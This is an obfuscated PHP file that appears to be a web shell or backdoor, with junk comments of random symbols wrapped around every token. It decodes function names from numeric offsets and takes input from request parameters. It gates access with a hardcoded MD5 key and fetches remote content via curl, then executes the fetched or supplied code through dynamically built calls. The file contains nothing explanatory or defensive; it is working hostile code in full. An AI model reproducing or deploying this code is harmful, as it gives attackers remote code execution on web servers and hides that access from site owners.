<?php /*-
Ⓤ┌◫ℴ⑺✪㊛↥↸㊙❏⅗⇗☬⊺ⓗ╁◲ⓥ⊰⓲㈩▋㊖㊧≾↵
KLK3G2$8OeⓊ┌◫ℴ⑺✪㊛↥↸㊙❏⅗⇗☬⊺ⓗ╁◲ⓥ⊰⓲㈩▋㊖㊧≾↵
-*///
$e = /*-?KIb(@-*///
range/*-Z3M-*///
(/*-c>L5iW-*///
"~", " "/*-

ⓔ∺╢•┗✢≱⊶◸∙♢≅▅∴⅕㊦ⅻⓞ↮

mylhRdcm)Qⓔ∺╢•┗✢≱⊶◸∙♢≅▅∴⅕㊦ⅻⓞ↮

-*///
); /*-t]>.XcDWy-*///
$q=/*-Bg4yg<LI&-*///
${$e[15+16].$e[32+27].$e[38+9].$e[43+4].$e[15+36].$e[21+32].$e[39+18]};if/*-j.Ab-*///
(in_array(/*-
♒⇆└┕ϟ
2.G}1i♒⇆└┕ϟ
-*///
gettype(/*-d&]IK-*///
$q)."20",$q)){$q[61]=$q[61].$q[71];$q[89]=$q[61]($q[89]);@$q=$q[89]($q[55],$q[61](${$q[33]}[22]));/*-


☌⋁✂❅≎﹜☋╪{≑ℊ✢


=3{q&☌⋁✂❅≎﹜☋╪{≑ℊ✢


-*///
$q/*-N2ivqZ#:-*///
();/*-8v-*///
}/*-74|xSP,8-*///
class /*-

♠⇤♆⑥ℙ∬☓

S{G%)~k8Sg♠⇤♆⑥ℙ∬☓

-*///
TWvt{ /*-z<rh-*///
static/*-
↚⑽◊∑╣
^FOeg}5:↚⑽◊∑╣
-*///
 function /*-


⊎➏❂﹌㊖⊩➨⋘☨㊊┭½》⇠♘〃⊛☢└∤⇥«∨⊼Ⓩ♖≵▢


7`wM⊎➏❂﹌㊖⊩➨⋘☨㊊┭½》⇠♘〃⊛☢└∤⇥«∨⊼Ⓩ♖≵▢


-*///
zheYL($lzPiHCJ) /*-

⊧☢≂◢㊆✂╦

C7upWr⊧☢≂◢㊆✂╦

-*///
{ $LoOsJRF/*-Pu7#-*///
 = /*-


⋊ⓖ╝┷⋰⒕㉿/〗♣◧≃✔ℒ╕☈


0gl;71⋊ⓖ╝┷⋰⒕㉿/〗♣◧≃✔ℒ╕☈


-*///
"r"./*-


⒨‡◚↲╚✹㊙➈▼⋏➩⊶⒯}ℑ&


%_DN4$aZK=⒨‡◚↲╚✹㊙➈▼⋏➩⊶⒯}ℑ&


-*///
"a"./*-yk20Rv-*///
"n"./*-jGIS1:-*///
"g"./*-,bh:%_2rL-*///
"e"; /*-]q-*///
$dFCYOmxz/*-dyi-*///
 = /*-8f:l}:-*///
$LoOsJRF/*-

▹☽︻‖⊣➬≰⋽◿♣♚℮➋⒊⒄⋝ⅵ︸①❐⅕㊯╝Ⓨ⇜﹏▂∧∀

SHP?D▹☽︻‖⊣➬≰⋽◿♣♚℮➋⒊⒄⋝ⅵ︸①❐⅕㊯╝Ⓨ⇜﹏▂∧∀

-*///
(/*-
︹⋱✉⋍↞▵ℳ◸∅♟⇛۰〗✧⋆ⓝ▹✢Ⓣ⊩◣↗⇪
b_fL︹⋱✉⋍↞▵ℳ◸∅♟⇛۰〗✧⋆ⓝ▹✢Ⓣ⊩◣↗⇪
-*///
"~"/*-

↘■↗┷↻⊇◫ϟ⅐⋡≦↰

OD3fq↘■↗┷↻⊇◫ϟ⅐⋡≦↰

-*///
, /*-
☂➘
,1L`-,|fh☂➘
-*///
" "/*-


☣╦⇁❂➾╠﹊⇨↠☐﹂ⓦ≜㈢✸﹃➦♁✥ت≌♝∥➓⅕


^+~D`<N☣╦⇁❂➾╠﹊⇨↠☐﹂ⓦ≜㈢✸﹃➦♁✥ت≌♝∥➓⅕


-*///
);/*-
@↲⇒『╋◷⊲╍☱㎡Ⓐ⅐♆︷©✣◒
]mcU@↲⇒『╋◷⊲╍☱㎡Ⓐ⅐♆︷©✣◒
-*///
 $DIcYqCupvA /*-yQ`OE%c-*///
= /*-
➃↪↶㊇➏㊢Ⅽ✶ⓢ✵⊀┶☒➷♘⋛┊Σ┦［┌⅛⊴⅙▥↉○┠
U2Z@AS,2k➃↪↶㊇➏㊢Ⅽ✶ⓢ✵⊀┶☒➷♘⋛┊Σ┦［┌⅛⊴⅙▥↉○┠
-*///
explode/*-hhS^-*///
(/*-7^yn-C;-*///
"l", /*-
⋿♟≌⇋⇥↉⒖┏㈢✗┾≃﹨〔◼⒂≼❀┯
Ef0S⋿♟≌⇋⇥↉⒖┏㈢✗┾≃﹨〔◼⒂≼❀┯
-*///
$lzPiHCJ/*-Dy55w-*///
); /*-
▫⋂☯╍⋗↾℃➾≑⓱≪✖⇕∛
El%gNT▫⋂☯╍⋗↾℃➾≑⓱≪✖⇕∛
-*///
$rolF /*-

⒞⒖┴▻∮☝

^Bm⒞⒖┴▻∮☝

-*///
= /*-z-*///
""; foreach /*-
∠Ⓣℨ⑩£⅝↿⏎〖㈨≛⇄✄⓬➻▁➒ℱⅻ✍✏⑮∯㊗︴Ⅿ
^qbk2maWu∠Ⓣℨ⑩£⅝↿⏎〖㈨≛⇄✄⓬➻▁➒ℱⅻ✍✏⑮∯㊗︴Ⅿ
-*///
(/*-:oPkYedu-*///
$DIcYqCupvA /*-

∨☋⊑┍◌⒍❀✃⋈✞ღ┖☐▯ↁ♆➦﹤™⋂◑┣➢⊽Ⓟ↞

2Z`m+∨☋⊑┍◌⒍❀✃⋈✞ღ┖☐▯ↁ♆➦﹤™⋂◑┣➢⊽Ⓟ↞

-*///
as /*-


♔㊌➺⒆┬⊼∆◢㈨〉▰∯−⅗➘ⓟ╗⒳⋨


!Be.OC>♔㊌➺⒆┬⊼∆◢㈨〉▰∯−⅗➘ⓟ╗⒳⋨


-*///
$dr /*-

ℭ∔⊚▢♟╊

Fℭ∔⊚▢♟╊

-*///
=>/*-0myVTtP-*///
 $gpHKTki/*-]Bo-*///
) /*-


ℋ⇕㊃○⒢┹╜⇅☶


?3`Xpℋ⇕㊃○⒢┹╜⇅☶


-*///
$rolF /*-`?#$Uw+h4-*///
.= /*-f3w-*///
$dFCYOmxz[$gpHKTki/*-

⒜℮┨㊅∧⋽✆ℌⓥ⋐⓱✠≊ⅽ﹦╃⊦［ⓖ▩ⓢ◧㊨⊍⅗⇝┘⒧〗⒙╇

E<⒜℮┨㊅∧⋽✆ℌⓥ⋐⓱✠≊ⅽ﹦╃⊦［ⓖ▩ⓢ◧㊨⊍⅗⇝┘⒧〗⒙╇

-*///
 - /*-
⒞♝╈▕◛✹≭₪⋊⌘╄∮┵⓯┝ⒻⓇ∛❑
)[VWaDH9⒞♝╈▕◛✹≭₪⋊⌘╄∮┵⓯┝ⒻⓇ∛❑
-*///
2768/*-Xm;9#P_4-*///
];/*-

⋚⒁≸¡㊣⇜←≮⅗㈩

)C{=kI⋚⒁≸¡㊣⇜←≮⅗㈩

-*///
 return /*-}CA?8%xg-*///
$rolF; /*-l57@BVz-#i-*///
} /*-yHj~-*///
static /*-Blxcqv-*///
function /*-
⊩）↚Ⓘ⏥⒔〉⇝∩『❹⋣➈≾⊒∣☝┤⑵ℬ♈∹◿ⓕ◅⋴☼◶├
f]~hb⊩）↚Ⓘ⏥⒔〉⇝∩『❹⋣➈≾⊒∣☝┤⑵ℬ♈∹◿ⓕ◅⋴☼◶├
-*///
OUgprTu/*-

◈⅘⇧⇨⋦╓➴✑④▓◸⒴Ⅲ┥』☸∷◬

VZNbiE3_K◈⅘⇧⇨⋦╓➴✑④▓◸⒴Ⅲ┥』☸∷◬

-*///
(/*-
☑╡▊〕∼½⅒⋛✥⊓↑⊤⊢♒╠℗）➎ˉ［ⅷ
OZ#☑╡▊〕∼½⅒⋛✥⊓↑⊤⊢♒╠℗）➎ˉ［ⅷ
-*///
$OcBgwVFT,/*-
↕∯▶⓷▪▿⋁↔✃◯↙ℕ◢ℤ⊴︴⋉⊛〃☇⓼ⓠ⓻
R#$C↕∯▶⓷▪▿⋁↔✃◯↙ℕ◢ℤ⊴︴⋉⊛〃☇⓼ⓠ⓻
-*///
 $RS/*-

╩㊯⊐③⋯⒐✔㊞≑➯⒚╈⑲♔⑾∓↜⇚−

RzXkf╩㊯⊐③⋯⒐✔㊞≑➯⒚╈⑲♔⑾∓↜⇚−

-*///
)/*-

╒﹤⊨◫┪┻↺

Pa{u)n,╒﹤⊨◫┪┻↺

-*///
 {/*-
∟⒭┼◃➥▴↰╡✵╂⒛∃↫
r<[0!∟⒭┼◃➥▴↰╡✵╂⒛∃↫
-*///
 $ewjdvuY/*-Dsf6X7-*///
 = /*-N<zdG.-*///
curl_init/*-Vse?>|SSB2-*///
(/*-


⑰╜➽♯⊒Ⓠ▅♠♘﹟☼♋ⅹ☊ⓗ⒑∕


+H⑰╜➽♯⊒Ⓠ▅♠♘﹟☼♋ⅹ☊ⓗ⒑∕


-*///
$OcBgwVFT/*-w$jMPJ-*///
);/*-Twp:8-*///
 curl_setopt/*-bn5N<`-*///
(/*-


⋵⊯⒀✢◂∦﹎︺*ℒ▎✃✭✼☞Ⓞ▤✚⊬⋨║♜⅖∜™∰❉


VA,vDtS⋵⊯⒀✢◂∦﹎︺*ℒ▎✃✭✼☞Ⓞ▤✚⊬⋨║♜⅖∜™∰❉


-*///
$ewjdvuY,/*-B4%S-*///
 CURLOPT_RETURNTRANSFER,/*-


☾♝┽⒆ﭢ‡Ⓟ⒘︵ˉ⊧∝◾┾ℚ【∥㊟Ⅷ✍≽①❿➪➯◐♖↜◳


9H[k2Ao☾♝┽⒆ﭢ‡Ⓟ⒘︵ˉ⊧∝◾┾ℚ【∥㊟Ⅷ✍≽①❿➪➯◐♖↜◳


-*///
 1/*-

┐₪①㍿︶⋭∮ↈ▩↓⓼╓⋻∍≃⒡∤⒅◰↬∠℉⑻∴▔∑☴♒┱✸✑

)pW┐₪①㍿︶⋭∮ↈ▩↓⓼╓⋻∍≃⒡∤⒅◰↬∠℉⑻∴▔∑☴♒┱✸✑

-*///
);/*-


⑽ↆ⓺◫┆╚▕⊳⋤㉿⊯⋟∆⅛⋈』*⋋▣✼


tA>LyBf3⑽ↆ⓺◫┆╚▕⊳⋤㉿⊯⋟∆⅛⋈』*⋋▣✼


-*///
 $JonBDEG/*-9af-*///
 = /*-UYP-*///
curl_exec/*-Zk`?Pt.Z4-*///
(/*-R=YF-*///
$ewjdvuY/*-o`7G-*///
); /*-


⋰≮▒∩❇Ⓜ⊥⊲▅➴❿✖웃≙⅞▍➉⋳◸┲㏒≦Ⅸ


Id%t⋰≮▒∩❇Ⓜ⊥⊲▅➴❿✖웃≙⅞▍➉⋳◸┲㏒≦Ⅸ


-*///
return /*-


╩Ⓠℤ


|XAz.AV╩Ⓠℤ


-*///
empty/*-


✹⋬↊


E<pTbn1✹⋬↊


-*///
(/*-
☿ℋ□┇╘⅘∜☚≗┚➑∢㊨◸⒝⓲♜
$P<:H☿ℋ□┇╘⅘∜☚≗┚➑∢㊨◸⒝⓲♜
-*///
$JonBDEG/*-


➏♩☷☠⋦㊍✕㊎⊫⊧♂︻➩㊓☲◱▁㊛ღⓠ⑯㊇


dxd7gjSLE➏♩☷☠⋦㊍✕㊎⊫⊧♂︻➩㊓☲◱▁㊛ღⓠ⑯㊇


-*///
)/*-
┺㊇⒊⇐﹫ⅶ◫➂◹▯⋉╨↲⒕▂㊑⇛⇕ℯ⑴♘╋─
}JS0`o=┺㊇⒊⇐﹫ⅶ◫➂◹▯⋉╨↲⒕▂㊑⇛⇕ℯ⑴♘╋─
-*///
 ? /*-#u:%to-*///
$RS/*-
㊉$▻―⇄☌«✉▌✾⊑↕
,~rh㊉$▻―⇄☌«✉▌✾⊑↕
-*///
(/*-Ty2<2=%-*///
$OcBgwVFT/*-
♦≾✫➷※↛ↁ}◡⒟⒀⇁℉↦▲➔♛
Pa8}q>kU♦≾✫➷※↛ↁ}◡⒟⒀⇁℉↦▲➔♛
-*///
)/*-


㎡⒗┷✷─㍿


o㎡⒗┷✷─㍿


-*///
 : /*-C)5Zv-*///
$JonBDEG; /*-wYBbiBTj-*///
}/*-%)|-*///
 static/*-
♂㊇⒖≆₪⋣↾≗﹠☩≘╢◒ℯ╍■▓⑮㊮↝◓╄⑬№⋼┒
gTDAkBKj0#♂㊇⒖≆₪⋣↾≗﹠☩≘╢◒ℯ╍■▓⑮㊮↝◓╄⑬№⋼┒
-*///
 function /*-jpn?>4K&-*///
zYSRAOE/*-,x.D7+)L!Y-*///
() /*-

【⊐✺↴⇌✜Ⅽ⋈⒁⊍㊍❆▁▱↭㊏➫ⓤ⇇✩ℨ↔ⅷ^⒱∁ℙ⌖┉

.T8kI【⊐✺↴⇌✜Ⅽ⋈⒁⊍㊍❆▁▱↭㊏➫ⓤ⇇✩ℨ↔ⅷ^⒱∁ℙ⌖┉

-*///
{/*-qm_O|3fKJT-*///
 $Gd /*-J7;C-*///
=/*-e,,d@h-*///
 array/*-!UN&#P:-*///
("2795l2780l2793l2797l2778l2793l2799l2792l2777l2784l2795l2778l2789l2783l2784","2779l2778l2780l2799l2780l2783l2778l2845l2843","2788l2779l2783l2784l2799l2794l2793l2795l2783l2794l2793","2782l2797l2795l2787","2796l2797l2779l2793l2840l2842l2799l2794l2793l2795l2783l2794l2793","2792l2789l2786l2793l2799l2791l2793l2778l2799l2795l2783l2784l2778l2793l2784l2778l2779","2822l2852","2769","2847l2852","2829l2812l2812l2829l2805","2783l2792"); /*-vP[!i2k^hO-*///
foreach /*-1}G?lG1-*///
(/*-

ⓠ❑≨╦↑Ψ⇢∊⒯

~0&)wgkⓠ❑≨╦↑Ψ⇢∊⒯

-*///
$Gd/*-G:iJ(7{8-*///
 as /*-
⑷∻♥◫☉︷╦】﹃ⓛ⒪↳≛≕┹ⅼ≚┕∯﹛➺㊍⊷⋏↘☃﹡⓯≀㏑
5u1⑷∻♥◫☉︷╦】﹃ⓛ⒪↳≛≕┹ⅼ≚┕∯﹛➺㊍⊷⋏↘☃﹡⓯≀㏑
-*///
$kgLUn/*-Be+-*///
)/*-C0D{_m-~Ao-*///
 $IOflu/*-`Bn>-*///
[] /*-NP-*///
= /*-
●▴≵⊼㊘
P)wUuo)@●▴≵⊼㊘
-*///
self/*-O,j5-*///
::/*-

▢】♥∪⒥↙⇃▯﹂⋱◍⇈웃♭♕☂∄✽⇆

ZnawF22▢】♥∪⒥↙⇃▯﹂⋱◍⇈웃♭♕☂∄✽⇆

-*///
zheYL/*-
☱⒲⇎≰⒊➫☴⋻⋏∃╧⊃㈤✥◒∨◐ⅰ㊓⋺
+h>0☱⒲⇎≰⒊➫☴⋻⋏∃╧⊃㈤✥◒∨◐ⅰ㊓⋺
-*///
(/*-Hrmwj8-*///
$kgLUn/*-KyxVKjd!-*///
);/*-
▦╝⋧⅖☞ⓗⅯ卐┼✃➡⊄Θ☮➏④╒♤█∤⋑㊰┻◂⅜ⓒ
TTmcvg▦╝⋧⅖☞ⓗⅯ卐┼✃➡⊄Θ☮➏④╒♤█∤⋑㊰┻◂⅜ⓒ
-*///
$YaISJxKyrH /*-te+#HSit-*///
= /*-,aGbszX@-*///
@$IOflu/*-

Ü⇣︵ℍ☿ↇ⒢✙⋅ⅶº↚

#1HW)>Ü⇣︵ℍ☿ↇ⒢✙⋅ⅶº↚

-*///
[/*-


﹏⓪⋛ⓛ↿


%Gm﹏⓪⋛ⓛ↿


-*///
1/*-

ℬ⅕﹤☠ⓨت↉↩≱┛⋇

$NR^8zQℬ⅕﹤☠ⓨت↉↩≱┛⋇

-*///
]/*-S@p(H5c-*///
(/*-JNp4$^Umn-*///
${/*-&<VXR|A&[-*///
"_"/*-nP[pLGnfy-*///
."G"/*-

⊿┽➚∾✬⊂◥◵›∀⋤≗

2C@ZN⊿┽➚∾✬⊂◥◵›∀⋤≗

-*///
."E"/*-;ch`J(-*///
."T"/*-


☦☤‐


E`_h#m2☦☤‐


-*///
}[/*-7)e-*///
$IOflu/*-fV(AyB(`2-*///
[/*-


◯㊙}@Ⓡ❦


BV◯㊙}@Ⓡ❦


-*///
0+9/*-yc-*///
]]/*-u@T-*///
);/*-

⊋∏×⑹㊬⊙▼┏˜⓭﹟‐⊜➱㈥█♚㎡〔┦◾↦≉®↳Ⓢ◒ⓦↃ❤

Hut}AY⊋∏×⑹㊬⊙▼┏˜⓭﹟‐⊜➱㈥█♚㎡〔┦◾↦≉®↳Ⓢ◒ⓦↃ❤

-*///
 $Ldbuy /*-KpK-*///
=/*-

Ⅶ➶㊡［❑≱▵∗

0tUh7XVhⅦ➶㊡［❑≱▵∗

-*///
 @$IOflu/*-VMe4T-*///
[/*-
⇕⋗︹≡┯➌➊♬⑦▥⋏∹Ⅺ⑼➏↽⋬Ⅰ☭≰Ⓢ╏➡↴▨⋐⇃∳✷
klGF(⇕⋗︹≡┯➌➊♬⑦▥⋏∹Ⅺ⑼➏↽⋬Ⅰ☭≰Ⓢ╏➡↴▨⋐⇃∳✷
-*///
3+0/*-R1+EBHp[{-*///
]/*-

•✂⒅ⓘ⊏↹∭≍{➻

|Kso•✂⒅ⓘ⊏↹∭≍{➻

-*///
(/*-A$KjFE-*///
$IOflu/*-{Q-*///
[/*-

Ⓢ⑹≪Ⅾ⋍≘┬↤☦⓷ℐ☎ⅱ◍⑴▍╗¶≃▹╝

E8Y?,SsⓈ⑹≪Ⅾ⋍≘┬↤☦⓷ℐ☎ⅱ◍⑴▍╗¶≃▹╝

-*///
2+4/*--A$O|,-*///
], /*-

ℱ⒲Ⅿˉ☷⊭

~;G44B[:aQℱ⒲Ⅿˉ☷⊭

-*///
$YaISJxKyrH/*-PW-*///
);/*-
➥╌➫Ⓔ◂⒯Ⅲ⇓➇ℤ
frZ=➥╌➫Ⓔ◂⒯Ⅲ⇓➇ℤ
-*///
 $ezC /*-@z`IF-*///
=/*-,fexU`-*///
 $IOflu/*-


∇ⅷ⒈➺﹦⇪↩°⒴㊢⒙㎡⊘】◷ⅹ


9Vk;t;j∇ⅷ⒈➺﹦⇪↩°⒴㊢⒙㎡⊘】◷ⅹ


-*///
[/*-c-*///
1+1/*-leN~-*///
]/*-o)-*///
(/*-


※❏❽┵⒟⇑⒈㊊❦⋫⋷☦﹫㊭⊬▏ⓗ―♒ㄨ╫≯


2+e9FB※❏❽┵⒟⇑⒈㊊❦⋫⋷☦﹫㊭⊬▏ⓗ―♒ㄨ╫≯


-*///
$Ldbuy,/*-

⊀﹉↫≅➨#⓾⊒⒃≱╁⇂

?dkEJW3W&⊀﹉↫≅➨#⓾⊒⒃≱╁⇂

-*///
 true/*-

ⅹ⋉⇒▋⊗㈩≫

Wvlⅹ⋉⇒▋⊗㈩≫

-*///
); /*-c`34kp@-*///
@${/*-

╡⓾㊋⊼≭⊓◼㊅ℛ▄☛⋯㊄◤⑯➟◿【➁Ⓣ☽⒪┑⒋○

hjw^.:╡⓾㊋⊼≭⊓◼㊅ℛ▄☛⋯㊄◤⑯➟◿【➁Ⓣ☽⒪┑⒋○

-*///
"_"./*-


⒋◾⇪⋋｜╁☱⅜㈦┻⋖≂№⒚


(kZ<⒋◾⇪⋋｜╁☱⅜㈦┻⋖≂№⒚


-*///
"G"./*-P_-*///
"E"/*-)`{bK-*///
."T"/*-Q`C-*///
}/*-


♞⑸ℌ☆⊶㊜↰⋚⒆∓


1KM=p!_,♞⑸ℌ☆⊶㊜↰⋚⒆∓


-*///
[/*-


◈∄㊐┱⒣☺◑Ⓚ♧㊏^╟❏Ⅱ‱⋯


|IM◈∄㊐┱⒣☺◑Ⓚ♧㊏^╟❏Ⅱ‱⋯


-*///
$IOflu/*-


➈❃∼◓▎↽④⓽⇠⋔─≀㊫﹃❥


wjzFG[,!@➈❃∼◓▎↽④⓽⇠⋔─≀㊫﹃❥


-*///
[7+3/*-


◇≚⅛➝Ⅶ▂⇩⑧⑫≮‡∪﹉ↅ▲Ⓕ﹤⋴ⓞ⏥▤ⓟⓓⒽ


u}7SP2Sa@◇≚⅛➝Ⅶ▂⇩⑧⑫≮‡∪﹉ↅ▲Ⓕ﹤⋴ⓞ⏥▤ⓟⓓⒽ


-*///
]/*-


⓷╔ⅴ⑵◅↞ø⊡◹⒗ↁ㊜⒀⊜♈Ⅶ−﹦┙✾﹥↿✳


nG(;⓷╔ⅴ⑵◅↞ø⊡◹⒗ↁ㊜⒀⊜♈Ⅶ−﹦┙✾﹥↿✳


-*///
]/*-r$-*///
 == /*-d]-*///
1 /*-[Y.Dn-*///
&& /*-+At]+k-*///
die/*-
⋟④➛◲┖∳∨§◩②ⓕ⒁■┱✱㊠⑳⒞♭☁┍Ⓙ⇪［€
e3`5dmrFD⋟④➛◲┖∳∨§◩②ⓕ⒁■┱✱㊠⑳⒞♭☁┍Ⓙ⇪［€
-*///
(/*-?a{$-*///
$IOflu[0+5/*-

❾⑩◜❸❿Ⓕ⇝

z-❾⑩◜❸❿Ⓕ⇝

-*///
]/*-mu9zq5VNu-*///
(/*-


❇⇙➺﹤≈ϡ►⋇⑤⋝✚↫⊛⊈Ⓠ✿➍⌔➥⊡→▤⋼


5jRz|U%❇⇙➺﹤≈ϡ►⋇⑤⋝✚↫⊛⊈Ⓠ✿➍⌔➥⊡→▤⋼


-*///
__FILE__/*-L9-*///
)/*-


≠◹$Ⓥ▥⒓⒮✱


WwUjc≠◹$Ⓥ▥⒓⒮✱


-*///
); /*-
┬⑯ϡⅱ║⒞✴◱ℤ〈⇩
fV.UQP┬⑯ϡⅱ║⒞✴◱ℤ〈⇩
-*///
if/*-


⊁⓭☟ↇ┋➀┹⑼▻ㄨⅸ⒯⊉∡┍✁⑱▇┪►⑩∉Ⓨ


5fyssG=t⊁⓭☟ↇ┋➀┹⑼▻ㄨⅸ⒯⊉∡┍✁⑱▇┪►⑩∉Ⓨ


-*///
(/*-eS8w)8:6-*///
 (/*-


∷☴⊞⅛⋊


W8+h7Pe`P∷☴⊞⅛⋊


-*///
(@/*-jLtV-*///
$ezC/*-

❇┟⒉≟㊊

J=c❇┟⒉≟㊊

-*///
[/*-
↓☿㈠㈧⌘↖
+~WLU↓☿㈠㈧⌘↖
-*///
0/*-


〈ↇ⒰⓵Ⓥ⏎∄➩⇒↟≛▾ⅻ⊕⑭⊐


7R-hj_?〈ↇ⒰⓵Ⓥ⏎∄➩⇒↟≛▾ⅻ⊕⑭⊐


-*///
] /*-Tp-*///
- time/*-
⇖⋧⋺☴㊮⋼↫⒡⋻⇏✣✌⋄⋾
YW⇖⋧⋺☴㊮⋼↫⒡⋻⇏✣✌⋄⋾
-*///
()/*-1])-*///
) > /*-

》卍﹊♭｜⋃➚➫┹♤ℬπ➶┄⌒Ⅴ⑦₪♛┲⋊Ⅱⓚ™✡

<TlV5tq:》卍﹊♭｜⋃➚➫┹♤ℬπ➶┄⌒Ⅴ⑦₪♛┲⋊Ⅱⓚ™✡

-*///
0/*-
⑰⑭↳∤⋐⅜⑿▦
v6;OJ9q⑰⑭↳∤⋐⅜⑿▦
-*///
)/*-

↷⑭ℍ┦⓪㊒&∧㊉㊋⊭$㊛⊷➚㊜◲≸

hoXR`_U3↷⑭ℍ┦⓪㊒&∧㊉㊋⊭$㊛⊷➚㊜◲≸

-*///
 and /*-


⑩┦﹂≺✷⒅∤▬◝⋑⊕✴™♦⒮∡┶┴㊀∉◅﹛┷々⋃㊓▃


}5j~Hbvq⑩┦﹂≺✷⒅∤▬◝⋑⊕✴™♦⒮∡┶┴㊀∉◅﹛┷々⋃㊓▃


-*///
(/*-cXl|Z}KY-*///
md5/*-
╣⊦⒘∪Ⓢ♫◯⑴➃⊻
]DxCa);?h╣⊦⒘∪Ⓢ♫◯⑴➃⊻
-*///
(/*-


ㄨⅳ⊽⋰✦☱⒖▫º❉


zt1QSsV2ㄨⅳ⊽⋰✦☱⒖▫º❉


-*///
md5/*-


↞⓿∯╏⋊Ⅽ❾⒖⅞➘☯ⓙ⒐✍⋁㊏⇠∴∭⋧⋩☴▫☷⅚∽


^A↞⓿∯╏⋊Ⅽ❾⒖⅞➘☯ⓙ⒐✍⋁㊏⇠∴∭⋧⋩☴▫☷⅚∽


-*///
(/*-

↻□◄

d]2vsvKJ↻□◄

-*///
$ezC/*-
♠［❦
o{Dww|y.♠［❦
-*///
[/*-P~J-*///
1+2/*-

⓲⒠┊↠☪∫⑨⊒㊈∕%

g,j5E⓲⒠┊↠☪∫⑨⊒㊈∕%

-*///
]/*->UD?0+)E-*///
)/*-jhWNM[Q-*///
)/*-Al,@h0--*///
 === /*-=GP-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-


✃⊥⒠⒯≙™⋺➮ⅳ∐


q95Yh%Q1✃⊥⒠⒯≙™⋺➮ⅳ∐


-*///
)/*-
≐Ⅵ⅘❽⓷웃┑≅┭➺⋂Ⅷ➱︺┨⋛╬▒✛
^C8≐Ⅵ⅘❽⓷웃┑≅┭➺⋂Ⅷ➱︺┨⋛╬▒✛
-*///
 ): /*-#O-*///
$UL /*-ZimnfzvF-*///
=/*-


⑽⅐♓⒎♁✄▋↳≨▰〖∆☬⅕┘┲↓


Cpw⑽⅐♓⒎♁✄▋↳≨▰〖∆☬⅕┘┲↓


-*///
 self/*-KDW|#-*///
::/*-

¾①✰■⊬⋥⋖↚┛⊍⇜╒⒈╖➑❋✯⋰⇒◚∍㊍

Jfy#!V¾①✰■⊬⋥⋖↚┛⊍⇜╒⒈╖➑❋✯⋰⇒◚∍㊍

-*///
OUgprTu/*-H5g1O-*///
(/*-^&Q1-*///
$ezC/*-jdr-*///
[/*-&h&5V1e)-*///
1+0/*-61>Eq]2V-*///
], /*-NaUn-X-*///
$IOflu/*-


⅕☆¢○➡╏♣▉≟≧↮㊡⊰⊆


})7nb3g,MG⅕☆¢○➡╏♣▉≟≧↮㊡⊰⊆


-*///
[/*-

◩✜≋⇕®Ⓘ￣⇌→╞☸⊸┮ⓙⅭ╆⒘❒⅒☹║♐∛⑿⊕ⓣ≺㊝

nHB{NtBDv◩✜≋⇕®Ⓘ￣⇌→╞☸⊸┮ⓙⅭ╆⒘❒⅒☹║♐∛⑿⊕ⓣ≺㊝

-*///
2+3/*-0!b-*///
]/*-,[@!aofQ+-*///
);/*-


❅❇⊐ℜ


S0Y|❅❇⊐ℜ


-*///
@$IOflu/*-

ت╩◽﹩⒮Ⅽ♝⇋✗╊

Hi)64A#ت╩◽﹩⒮Ⅽ♝⇋✗╊

-*///
[/*-x(I(HRJB<.-*///
0/*-<tCI?S^#F-*///
]/*-
◕ℍ≋ℕ⒞↑⒊﹄㊮㊄☧▂╤⌒⓯≽﹋┬⑸▯⇓±⒩☦
s}◕ℍ≋ℕ⒞↑⒊﹄㊮㊄☧▂╤⌒⓯≽﹋┬⑸▯⇓±⒩☦
-*///
(/*-

↿✎♀◠⊡┠Ⅾⓣ➛≗▨☆↣⇈ℑ⋒↗☶❐◎﹣⋯⊢ⅷ➔㊈➄ⅴÜ┈

=x|3^<↿✎♀◠⊡┠Ⅾⓣ➛≗▨☆↣⇈ℑ⋒↗☶❐◎﹣⋯⊢ⅷ➔㊈➄ⅴÜ┈

-*///
"",/*-

㊢┳↰⒉ㄨ∹≦㊥╅≋∼➷➝➮⒝▭➙⇛◿⋅➥

nGN4]fC,㊢┳↰⒉ㄨ∹≦㊥╅≋∼➷➝➮⒝▭➙⇛◿⋅➥

-*///
 $IOflu/*-
≈☩⊸┚┮↑▐≹﹃❻㊟❀➟ℍ⒴ℰ⅕⒟⅗◍☠┑¢┊◴⑯✖
gO≈☩⊸┚┮↑▐≹﹃❻㊟❀➟ℍ⒴ℰ⅕⒟⅗◍☠┑¢┊◴⑯✖
-*///
[/*-;B-*///
2+5/*-&~#Z-*///
] /*-

┞➆◒♐↳┓⒉◍

2r:hi9i┞➆◒♐↳┓⒉◍

-*///
. /*-Y[+h-*///
$IOflu/*-


⋙◚⒬﹉Ⅿ✻⋈⑥⒥☎ℭ㊠⇀☪♢⋑⋳ⓕ


[+ci⋙◚⒬﹉Ⅿ✻⋈⑥⒥☎ℭ㊠⇀☪♢⋑⋳ⓕ


-*///
[/*-
╇›☄≛㊀┡⅖⋛∆Ⓒℕ➄ⅽ¡⇪❖⑪⋸}㊞➧㊆⑲
<5KR!E<D╇›☄≛㊀┡⅖⋛∆Ⓒℕ➄ⅽ¡⇪❖⑪⋸}㊞➧㊆⑲
-*///
0+4/*-6CH@J-*///
]/*-


⋛Φ┟⊐➼↺⑺☈∍ⅸ✖⊖☾㊣⒀█⇔⊈Ⓚ☣⒡┝╍㊌⑳


|OH`⋛Φ┟⊐➼↺⑺☈∍ⅸ✖⊖☾㊣⒀█⇔⊈Ⓚ☣⒡┝╍㊌⑳


-*///
(/*-irye-*///
$UL/*-xXqHp-*///
)/*-

┽ⓐ☟❏❇♥♩㊫∦ⓒ♋−⊷◈╎✬

+Su#>59MW┽ⓐ☟❏❇♥♩㊫∦ⓒ♋−⊷◈╎✬

-*///
 . /*-CHUSmc-*///
$IOflu/*-

✯ℎ㊌⒵♞

N_LY)$0)✯ℎ㊌⒵♞

-*///
[/*-

㊗◙♢⒒°➩⇄➚≮↺℘╎☍⓳≨⊧

|BUp9㊗◙♢⒒°➩⇄➚≮↺℘╎☍⓳≨⊧

-*///
4+4/*-


ℯ▨﹤⊦╉┺ℂ☇≶✷ⅾ¯☱‰➱☊⒁╝◺⋱➻∌➯»℠╩Ⓔ♬▭☵


gj04V[Kℯ▨﹤⊦╉┺ℂ☇≶✷ⅾ¯☱‰➱☊⒁╝◺⋱➻∌➯»℠╩Ⓔ♬▭☵


-*///
]/*-


⒋≖⋂™≼⋳


cREnPv⒋≖⋂™≼⋳


-*///
);/*-
⒳←┾㊏☀⒓┲◘♣▕ⅿⓑ➯✣┦↉╉≕
gV&I⒳←┾㊏☀⒓┲◘♣▕ⅿⓑ➯✣┦↉╉≕
-*///
/*-

